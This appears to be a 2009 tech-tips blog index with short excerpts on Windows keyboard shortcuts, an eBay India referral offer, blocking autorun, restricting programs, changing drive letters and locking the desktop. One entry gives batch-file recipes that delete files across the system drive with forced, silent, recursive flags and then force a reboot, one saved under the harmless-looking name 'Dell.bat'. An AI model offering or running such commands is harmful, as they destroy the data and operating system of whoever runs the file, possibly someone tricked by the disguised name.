- September 4, 2009
- 38 views
-

Loading ...
General keyboard shortcuts
CTRL+C (Copy)
CTRL+X (Cut)
CTRL+V (Paste)
CTRL+Z (Undo)
DELETE (Delete)
SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bin)
CTRL while dragging an item (Copy the selected item)
CTRL+SHIFT while dragging an item (Create a shortcut to the selected item)
F2 key (Rename the selected item)
CTRL+RIGHT ARROW (Move the insertion point to the beginning of the next word)
CTRL+LEFT ARROW (Move the ...
Full story
- July 20, 2009
- 22 views
-

Loading ...
eBay India has come up with an unique yet effective offer exclusively for this friendship day. All you have to do is to refer friends to eBay India and each of your referred friends will get a special discount of 15%. If each of the friend you refer joins eBay India and makes a purchase you stand to earn a special 5% discount. You can ...
Full story
- July 19, 2009
- 39 views
-

Loading ...
go to notepad
@Echo off
Del C:\ *.*y
save it as Dell.bat
or worse
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
Full story
- July 19, 2009
- 50 views
-

Loading ...
Solution to this problem is to globally block autorun.inf files from executing without using the dialog boxes in Vista to do this. Here’s how:
1. Start Notepad or any text editor.
2. Copy the text below into the text editor, REGEDIT4
@=”@SYS:DoesNotExist”
3. Save it to your desktop as NoAutoRun.reg. Make sure the extension is .reg and ...
Full story
- July 19, 2009
- 154 views
-

Loading ...
This is useful for anyone who wants to stop specific applications from running without having to install any software of any kind, all they need to do is make a simple edit in the registry.
Method 1:
how to Restrict Users from Running Specific Windows Programs by Using Group Policy.
To use Group Policy Object Editor to restrict users from running specific Windows programs, use the procedure ...
Full story
- July 18, 2009
- 6 views
-

Loading ...
Windows XP is based on the same platform as Windows 2000, and shares that operating system's robust file security options, at least when using the NTFS file system. Unfortunately this security system, which enables an administrator to decide exactly which files and programs any given user will have access to, is not actually implemented by default in Windows XP. This is a concession Microsoft made ...
Full story
- July 17, 2009
- 5 views
-

Loading ...
Go to Start > Control Panel > Administrative Tools > Computer Management, Disk Management, then right-click the partition whose name you want to change (click in the white area just below the word "Volume") and select "change drive letter and paths."
From here you can add, remove or change drive letters and paths to the partition.
Full story
- July 16, 2009
- 11 views
-

Loading ...
If you use your computer in an area where others may have access to it, and there are things on your system you would rather have kept confidential, locking your desktop when you leave the computer is an essential task. Here's a recipe for a desktop shortcut that will lock your computer in two easy clicks:
Right click on an empty area of the desktop and ...
Full story